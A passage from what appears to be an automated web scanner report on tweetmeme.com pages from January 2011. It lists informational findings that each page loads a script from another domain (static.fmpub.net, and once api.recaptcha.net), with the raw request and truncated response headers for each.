Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:39:31 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0032310485839844
X-Served-In: 3.227087020874
X-Served-By: ded2061
Content-Length: 41327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Kev
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.431. http://tweetmeme.com/story/3829911938/good-thing-for-green-tech-ge-chief-jeff-immelt-to-chair-obama-s-council-on-jobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3829911938/good-thing-for-green-tech-ge-chief-jeff-immelt-to-chair-obama-s-council-on-jobs

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829911938/good-thing-for-green-tech-ge-chief-jeff-immelt-to-chair-obama-s-council-on-jobs HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:43:11 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037579536437988
X-Served-In: 3.8831679821014
X-Served-By: h03
Content-Length: 44932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Goo
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.432. http://tweetmeme.com/story/3830045531/jack-lalanne-dead-at-96-this-just-in-cnncom-blogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3830045531/jack-lalanne-dead-at-96-this-just-in-cnncom-blogs

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3830045531/jack-lalanne-dead-at-96-this-just-in-cnncom-blogs HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:39:08 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037209987640381
X-Served-In: 1.0409739017487
X-Served-By: ded2059
Content-Length: 41348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Jac
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.433. http://tweetmeme.com/story/3830307800/why-3d-doesn-t-work-and-never-will-case-closed-roger-eberts-journal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3830307800/why-3d-doesn-t-work-and-never-will-case-closed-roger-eberts-journal

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3830307800/why-3d-doesn-t-work-and-never-will-case-closed-roger-eberts-journal HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:39:19 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0068228244781494
X-Served-In: 2.4784219264984
X-Served-By: h04
Content-Length: 35490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Why
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.434. http://tweetmeme.com/story/3831012837/day-2-is-a-wrap-hiam-video-coming-soon-britney-on-twitpic previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3831012837/day-2-is-a-wrap-hiam-video-coming-soon-britney-on-twitpic

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3831012837/day-2-is-a-wrap-hiam-video-coming-soon-britney-on-twitpic HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:40:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0033118724822998
X-Served-In: 3.4866709709167
X-Served-By: ded2061
Content-Length: 35539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Day
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.435. http://tweetmeme.com/story/3831183930/nsfw-on-the-internet-nobody-knows-you-re-a-journalist previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3831183930/nsfw-on-the-internet-nobody-knows-you-re-a-journalist

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3831183930/nsfw-on-the-internet-nobody-knows-you-re-a-journalist HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:42:07 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0068161487579346
X-Served-In: 4.5812108516693
X-Served-By: ded2062
Content-Length: 38663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
NSF
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.436. http://tweetmeme.com/story/3831192964/super-junior-s-heechul-lambastes-netizens-through-a-series-of-tweets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3831192964/super-junior-s-heechul-lambastes-netizens-through-a-series-of-tweets

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3831192964/super-junior-s-heechul-lambastes-netizens-through-a-series-of-tweets HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:42:08 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0052130222320557
X-Served-In: 2.4108941555023
X-Served-By: h01
Content-Length: 35541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Sup
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.437. http://tweetmeme.com/story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:39:48 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0057921409606934
X-Served-In: 0.078665971755981
X-Served-By: ded2062
Content-Length: 51429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Goo
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.438. http://tweetmeme.com/style/day previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/style/day

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /style/day HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:50:52 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0061120986938477
X-Served-In: 0.050559997558594
X-Served-By: h03
Content-Length: 54800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.439. http://tweetmeme.com/update/ping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/update/ping

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdNyAUAAAAAAMXjazV5pTkf5sm7o5d_v4htKEne
http://static.fmpub.net/site/tweetmeme

Request

GET /update/ping HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:22 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0028672218322754
X-Served-In: 0.01808500289917
X-Served-By: ded2062
Content-Length: 25879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Twe
...[SNIP]...
</style>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdNyAUAAAAAAMXjazV5pTkf5sm7o5d_v4htKEne"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.440. http://tweetmeme.com/user/DhilipSiva_Film previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/DhilipSiva_Film

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/DhilipSiva_Film HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.003242015838623
X-Served-In: 2.073310136795
X-Served-By: h00
Content-Length: 38700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Dhi
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.441. http://tweetmeme.com/user/DodgersLakers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/DodgersLakers

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/DodgersLakers HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:09 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0025711059570312
X-Served-In: 1.5864078998566
X-Served-By: ded2060
Content-Length: 39731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Dod
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.442. http://tweetmeme.com/user/HarveyLevinTMZ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/HarveyLevinTMZ

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/HarveyLevinTMZ HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0032989978790283
X-Served-In: 1.6071109771729
X-Served-By: ded2060
Content-Length: 37508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Har
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.443. http://tweetmeme.com/user/Illlliam previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/Illlliam

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/Illlliam HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:35 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0027229785919189
X-Served-In: 1.6164269447327
X-Served-By: h03
Content-Length: 38809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
Ill
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.444. http://tweetmeme.com/user/JMayisKING previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/JMayisKING

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/JMayisKING HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:35 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0024230480194092
X-Served-In: 1.4324362277985
X-Served-By: h02
Content-Length: 34083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
JMa
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.445. http://tweetmeme.com/user/KDthunderup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/KDthunderup

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/KDthunderup HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:18 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037009716033936
X-Served-In: 0.68862390518188
X-Served-By: h02
Content-Length: 27942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> 
<title>
KDt
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.446. http://tweetmeme.com/user/OnJonasDubu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tweetmeme.com
Path:	/user/OnJonasDubu

Issue detail

The response dynamically includes the following script from another domain:

http://static.fmpub.net/site/tweetmeme

Request

GET /user/OnJonasDubu HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
